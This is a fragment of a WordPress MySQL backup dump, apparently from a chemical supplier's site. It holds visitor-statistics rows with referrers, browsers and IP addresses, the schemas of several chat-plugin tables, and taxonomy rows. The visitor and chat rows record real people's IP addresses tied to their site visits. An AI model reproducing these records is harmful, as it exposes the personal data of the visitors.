INSERT INTO `wp_statistics_visitor` VALUES (15274, '2016-11-04', 'https://www.miller-stephenson.com/product/urethane-coating/', 'MSIE', 'Windows', '9.0', '', '204.79.180.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15275, '2016-11-04', 'https://www.adsensecustomsearchads.com/', 'Firefox', 'Macintosh', '49.0', '', '72.209.45.39', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15276, '2016-11-04', 'https://www.google.com/', 'Chrome', 'Android', '44.0.2403.133', '', '115.164.95.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15277, '2016-11-04', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1', '', '69.114.187.49', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15278, '2016-11-04', 'https://balkanfarma.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.165.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15279, '2016-11-04', 'https://mmr.mschem.com/miller/pdf/Heloxy.pdf', 'Safari', 'Macintosh', '10.0.1', '', '211.30.196.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15280, '2016-11-04', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '600.1.4', '', '104.175.126.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15281, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15282, '2016-11-04', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '76.190.140.106', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15283, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.81.139.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15284, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15285, '2016-11-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '107.178.194.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15286, '2016-11-04', 'https://www.bing.com', 'MSIE', 'Windows', '8.0', '', '204.13.201.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15287, '2016-11-04', 'https://www.google.com.sg/', 'Safari', 'iPhone', '10.0', '', '183.90.36.77', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15288, '2016-11-04', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '10.16.126.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15289, '2016-11-04', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15290, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '109.99.29.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15291, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15292, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15293, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.169.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15294, '2016-11-04', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15295, '2016-11-04', 'https://www.adsensecustomsearchads.com/', 'Chrome', 'iPad', '44.0.2403.67', '', '99.244.207.46', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15296, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '85.248.227.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15297, '2016-11-04', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15298, '2016-11-04', 'https://www.google.co.jp/', 'Chrome', 'Windows', '54.0.2840.71', '', '130.34.95.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15299, '2016-11-04', 'https://doxyporno.com/', 'Unknown', 'Unknown', 'Unknown', '', '46.118.124.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15300, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.97', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15301, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15302, '2016-11-04', 'https://www.miller-stephenson.com', 'Screaming', 'Unknown', 'Unknown', '', '103.238.229.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15303, '2016-11-04', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.112.23', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15304, '2016-11-04', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '76.167.121.251', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15305, '2016-11-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '180.173.227.18', '000', 34, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15306, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.125', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15307, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15308, '2016-11-04', 'https://www.miller-stephenson.com/product/aeroduster-ms-222n/', 'MSIE', 'Windows', '5.5', '', '212.26.236.131', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15309, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15310, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15311, '2016-11-04', 'https://www.google.ca/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '174.1.232.73', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15312, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '176.126.252.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15313, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '197.231.221.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15314, '2016-11-04', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '35.0', '', '195.154.161.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15315, '2016-11-04', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15316, '2016-11-04', 'https://www.miller-stephenson.com/my-account/', 'Opera', 'Windows', '12.17', '', '185.116.45.78', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15317, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.161.224.107', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15318, '2016-11-04', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '223.72.103.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15319, '2016-11-04', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '223.72.103.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15320, '2016-11-04', 'https://www.google.com.hk/', 'Chrome', 'Windows', '54.0.2840.71', '', '202.77.43.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15321, '2016-11-04', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '70.208.229.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15322, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '79.3.221.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15323, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15324, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15325, '2016-11-04', 'https://dnepropetrovsk.mistr-x.org/', 'Opera', 'Windows', '8.00', '', '46.118.124.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15326, '2016-11-04', 'https://www.google.com.hk/', 'Chrome', 'Windows', '54.0.2840.71', '', '27.17.29.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15327, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '115.115.183.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15328, '2016-11-04', 'https://www.miller-stephenson.com/product/dry-film-ptfe-release-agent/', 'Chrome', 'Windows', '54.0.2840.71', '', '115.119.115.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15329, '2016-11-04', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.87', '', '199.107.68.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15330, '2016-11-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '199.107.68.202', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15331, '2016-11-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15332, '2016-11-04', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '185.158.116.221', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15333, '2016-11-04', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '185.158.116.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15334, '2016-11-04', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.115.183.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15335, '2016-11-04', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.119.115.234', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15336, '2016-11-04', 'https://www.google.com.tr/', 'Chrome', 'Windows', '54.0.2840.71', '', '91.199.191.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15337, '2016-11-04', 'https://tw.search.yahoo.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '59.124.12.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15338, '2016-11-04', 'https://www.google.co.uk/', 'Chrome', 'Windows', '54.0.2840.71', '', '195.130.210.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15339, '2016-11-04', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/eponex-cycloaliphatic-resin/', 'Safari', 'iPhone', '7.0', '', '199.30.24.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15340, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15341, '2016-11-04', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&cad=rja&uact=8&ved=0ahUKEwjXzaiP247QAhXF3SwKHQshCDAQFghMMAY&url=https%3A%2F%2Fwww.miller-stephenson.com%2Fproduct%2Fepon-1001f%2F&usg=AFQjCNGlHoLrlrY3gyC6RTHCjQmrQcpC1g&bvm=bv.137901846,d.bGg', 'MSIE', 'Windows', '11.0', '', '206.165.69.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15342, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15343, '2016-11-04', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '175.143.40.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15344, '2016-11-04', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '181.208.9.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15345, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '49.0', '', '204.187.14.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15346, '2016-11-04', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjYlLSG5o7QAhXF1xQKHbMJB1IQFggzMAM&url=https%3A%2F%2Fwww.miller-stephenson.com%2Fproduct%2Fepon-862%2F&usg=AFQjCNH-rG8F9FyrMEkPzR0haMhsr5k8fw', 'MSIE', 'Windows', '11.0', '', '149.238.52.136', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15347, '2016-11-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '149.238.52.136', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15348, '2016-11-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15349, '2016-11-04', 'https://www.google.com.sg/', 'Chrome', 'Windows', '54.0.2840.71', '', '110.92.98.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15350, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '39.0.2171.95', '', '50.22.90.226', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15351, '2016-11-04', 'https://search.seznam.cz/?q=krytox+Series+143&url=https%3A%2F%2Fwww.miller-stephenson.com%2Fkrytox%2F&data=lgLEEKL-bn5HP2wYEn0oZj7M3K_EQP0c_fuTJeze3vGwtWFwxe5YPFD7nhNFX_Bf9wA2Nt4la_FvNaMPXEQIWlxcLEgtXCKEIiCuCJEwmyXgJDtp_vjOWBxZOcQCINGSxAIi4cQCvmw%3D', 'MSIE', 'Windows', '10.0', '', '188.120.193.234', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15352, '2016-11-04', 'https://www.google.co.jp/', 'Chrome', 'Windows', '54.0.2840.71', '', '106.162.232.193', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15353, '2016-12-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15354, '2016-12-08', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '600.1.4', '', '166.137.10.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15355, '2016-12-08', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.99', '', '129.110.241.63', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15356, '2016-12-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '221.151.95.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15357, '2016-12-08', 'https://mschem.com/miller/buscador.php?palabra=gpl-207&buscador=+', 'Chrome', 'Windows', '54.0.2840.99', '', '50.241.93.93', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15358, '2016-12-08', 'https://www.google.ca/', 'Chrome', 'Windows', '49.0.2623.112', '', '199.71.136.69', '000', 2, 0);
#
# End of data contents of table `wp_statistics_visitor`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_tbl_agents`


#
# Delete any existing table `wp_tbl_agents`
#

DROP TABLE IF EXISTS `wp_tbl_agents`;


#
# Table structure of table `wp_tbl_agents`
#

CREATE TABLE `wp_tbl_agents` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `agent_name` varchar(255) DEFAULT NULL,
  `agent_id` varchar(255) DEFAULT NULL,
  `agent_email` varchar(255) DEFAULT NULL,
  `agent_password` varchar(255) DEFAULT NULL,
  `agent_image` varchar(255) DEFAULT NULL,
  `is_busy` varchar(255) DEFAULT NULL,
  `user_id` varchar(255) DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 ;

#
# Data contents of table `wp_tbl_agents`
#

#
# End of data contents of table `wp_tbl_agents`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_tbl_conversation`


#
# Delete any existing table `wp_tbl_conversation`
#

DROP TABLE IF EXISTS `wp_tbl_conversation`;


#
# Table structure of table `wp_tbl_conversation`
#

CREATE TABLE `wp_tbl_conversation` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `user_one` varchar(255) DEFAULT NULL,
  `user_two` varchar(255) DEFAULT NULL,
  `ip_address` varchar(255) DEFAULT NULL,
  `browser` varchar(255) DEFAULT NULL,
  `conv_date` varchar(255) DEFAULT NULL,
  `chat_option` mediumint(9) DEFAULT '0',
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 ;

#
# Data contents of table `wp_tbl_conversation`
#
 
INSERT INTO `wp_tbl_conversation` VALUES (1, '730044', '74528693', '107.3.77.7', 'Google Chrome 53.0.2785.116 on windows', '23-09-2016 08:05:52 pm', 0);
#
# End of data contents of table `wp_tbl_conversation`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_tbl_messages`


#
# Delete any existing table `wp_tbl_messages`
#

DROP TABLE IF EXISTS `wp_tbl_messages`;


#
# Table structure of table `wp_tbl_messages`
#

CREATE TABLE `wp_tbl_messages` (
  `mid` mediumint(9) NOT NULL AUTO_INCREMENT,
  `conv_id` int(11) DEFAULT NULL,
  `user_from` varchar(255) DEFAULT NULL,
  `user_to` varchar(255) DEFAULT NULL,
  `message` varchar(500) DEFAULT NULL,
  `attachment` varchar(500) DEFAULT NULL,
  `msgdate` varchar(255) DEFAULT NULL,
  UNIQUE KEY `mid` (`mid`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 ;

#
# Data contents of table `wp_tbl_messages`
#
 
INSERT INTO `wp_tbl_messages` VALUES (1, 1, '730044', '74528693', 'hello', '', '23-09-2016 08:05:52 pm');
#
# End of data contents of table `wp_tbl_messages`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_tbl_offlinechat`


#
# Delete any existing table `wp_tbl_offlinechat`
#

DROP TABLE IF EXISTS `wp_tbl_offlinechat`;


#
# Table structure of table `wp_tbl_offlinechat`
#

CREATE TABLE `wp_tbl_offlinechat` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `user_name` varchar(255) DEFAULT NULL,
  `user_email` varchar(255) DEFAULT NULL,
  `ip_address` varchar(255) DEFAULT NULL,
  `browser` varchar(255) DEFAULT NULL,
  `conv_date` varchar(255) DEFAULT NULL,
  `message` varchar(255) DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 ;

#
# Data contents of table `wp_tbl_offlinechat`
#

#
# End of data contents of table `wp_tbl_offlinechat`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_term_relationships`


#
# Delete any existing table `wp_term_relationships`
#

DROP TABLE IF EXISTS `wp_term_relationships`;


#
# Table structure of table `wp_term_relationships`
#

CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_term_relationships`
#
 
INSERT INTO `wp_term_relationships` VALUES (115, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (126, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (128, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (131, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (134, 7, 0); 
INSERT INTO `wp_term_relationships` VALUES (182, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (182, 17, 0); 
INSERT INTO `wp_term_relationships` VALUES (182, 190, 0); 
INSERT INTO `wp_term_relationships` VALUES (182, 392, 0); 
INSERT INTO `wp_term_relationships` VALUES (182, 399, 0); 
INSERT INTO `wp_term_relationships` VALUES (182, 503, 0); 
INSERT INTO `wp_term_relationships` VALUES (182, 504, 0); 
INSERT INTO `wp_term_relationships` VALUES (182, 527, 0); 
INSERT INTO `wp_term_relationships` VALUES (190, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (190, 27, 0); 
INSERT INTO `wp_term_relationships` VALUES (190, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (190, 400, 0); 
INSERT INTO `wp_term_relationships` VALUES (190, 401, 0); 
INSERT INTO `wp_term_relationships` VALUES (190, 402, 0); 
INSERT INTO `wp_term_relationships` VALUES (190, 403, 0); 
INSERT INTO `wp_term_relationships` VALUES (190, 404, 0); 
INSERT INTO `wp_term_relationships` VALUES (190, 405, 0); 
INSERT INTO `wp_term_relationships` VALUES (205, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (214, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (290, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (290, 389, 0); 
INSERT INTO `wp_term_relationships` VALUES (290, 390, 0); 
INSERT INTO `wp_term_relationships` VALUES (290, 392, 0); 
INSERT INTO `wp_term_relationships` VALUES (290, 394, 0); 
INSERT INTO `wp_term_relationships` VALUES (290, 411, 0); 
INSERT INTO `wp_term_relationships` VALUES (290, 526, 0); 
INSERT INTO `wp_term_relationships` VALUES (293, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (293, 389, 0); 
INSERT INTO `wp_term_relationships` VALUES (293, 390, 0); 
INSERT INTO `wp_term_relationships` VALUES (293, 392, 0); 
INSERT INTO `wp_term_relationships` VALUES (293, 394, 0); 
INSERT INTO `wp_term_relationships` VALUES (293, 411, 0); 
INSERT INTO `wp_term_relationships` VALUES (293, 526, 0); 
INSERT INTO `wp_term_relationships` VALUES (297, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (297, 17, 0); 
INSERT INTO `wp_term_relationships` VALUES (297, 190, 0); 
INSERT INTO `wp_term_relationships` VALUES (297, 389, 0); 
INSERT INTO `wp_term_relationships` VALUES (297, 391, 0); 
INSERT INTO `wp_term_relationships` VALUES (297, 392, 0); 
INSERT INTO `wp_term_relationships` VALUES (297, 393, 0); 
INSERT INTO `wp_term_relationships` VALUES (297, 411, 0); 
INSERT INTO `wp_term_relationships` VALUES (297, 489, 0); 
INSERT INTO `wp_term_relationships` VALUES (297, 526, 0); 
INSERT INTO `wp_term_relationships` VALUES (302, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (302, 17, 0); 
INSERT INTO `wp_term_relationships` VALUES (302, 190, 0); 
INSERT INTO `wp_term_relationships` VALUES (302, 392, 0); 
INSERT INTO `wp_term_relationships` VALUES (302, 399, 0); 
INSERT INTO `wp_term_relationships` VALUES (302, 527, 0); 
INSERT INTO `wp_term_relationships` VALUES (303, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (303, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (303, 334, 0); 
INSERT INTO `wp_term_relationships` VALUES (303, 335, 0); 
INSERT INTO `wp_term_relationships` VALUES (303, 336, 0); 
INSERT INTO `wp_term_relationships` VALUES (303, 391, 0); 
INSERT INTO `wp_term_relationships` VALUES (303, 451, 0); 
INSERT INTO `wp_term_relationships` VALUES (303, 528, 0); 
INSERT INTO `wp_term_relationships` VALUES (305, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (305, 528, 0); 
INSERT INTO `wp_term_relationships` VALUES (306, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (306, 528, 0); 
INSERT INTO `wp_term_relationships` VALUES (308, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (308, 20, 0); 
INSERT INTO `wp_term_relationships` VALUES (310, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (310, 389, 0); 
INSERT INTO `wp_term_relationships` VALUES (310, 392, 0); 
INSERT INTO `wp_term_relationships` VALUES (310, 394, 0); 
INSERT INTO `wp_term_relationships` VALUES (310, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (310, 411, 0); 
INSERT INTO `wp_term_relationships` VALUES (310, 526, 0); 
INSERT INTO `wp_term_relationships` VALUES (347, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (347, 96, 0); 
INSERT INTO `wp_term_relationships` VALUES (347, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (347, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (347, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (347, 452, 0); 
INSERT INTO `wp_term_relationships` VALUES (400, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (400, 17, 0); 
INSERT INTO `wp_term_relationships` VALUES (400, 318, 0); 
INSERT INTO `wp_term_relationships` VALUES (400, 388, 0); 
INSERT INTO `wp_term_relationships` VALUES (400, 389, 0); 
INSERT INTO `wp_term_relationships` VALUES (400, 390, 0); 
INSERT INTO `wp_term_relationships` VALUES (400, 411, 0); 
INSERT INTO `wp_term_relationships` VALUES (400, 525, 0); 
INSERT INTO `wp_term_relationships` VALUES (402, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (402, 97, 0); 
INSERT INTO `wp_term_relationships` VALUES (402, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (402, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (402, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (402, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (402, 113, 0); 
INSERT INTO `wp_term_relationships` VALUES (410, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (410, 98, 0); 
INSERT INTO `wp_term_relationships` VALUES (410, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (410, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (410, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (410, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (410, 111, 0); 
INSERT INTO `wp_term_relationships` VALUES (410, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (419, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (419, 318, 0); 
INSERT INTO `wp_term_relationships` VALUES (419, 389, 0); 
INSERT INTO `wp_term_relationships` VALUES (419, 390, 0); 
INSERT INTO `wp_term_relationships` VALUES (419, 392, 0); 
INSERT INTO `wp_term_relationships` VALUES (419, 394, 0); 
INSERT INTO `wp_term_relationships` VALUES (419, 411, 0); 
INSERT INTO `wp_term_relationships` VALUES (419, 525, 0); 
INSERT INTO `wp_term_relationships` VALUES (421, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (421, 45, 0); 
INSERT INTO `wp_term_relationships` VALUES (421, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (421, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (421, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (421, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (423, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (423, 318, 0); 
INSERT INTO `wp_term_relationships` VALUES (423, 389, 0); 
INSERT INTO `wp_term_relationships` VALUES (423, 390, 0); 
INSERT INTO `wp_term_relationships` VALUES (423, 392, 0); 
INSERT INTO `wp_term_relationships` VALUES (423, 394, 0); 
INSERT INTO `wp_term_relationships` VALUES (423, 411, 0); 
INSERT INTO `wp_term_relationships` VALUES (423, 525, 0); 
INSERT INTO `wp_term_relationships` VALUES (425, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (425, 389, 0); 
INSERT INTO `wp_term_relationships` VALUES (425, 392, 0); 
INSERT INTO `wp_term_relationships` VALUES (425, 394, 0); 
INSERT INTO `wp_term_relationships` VALUES (425, 398, 0); 
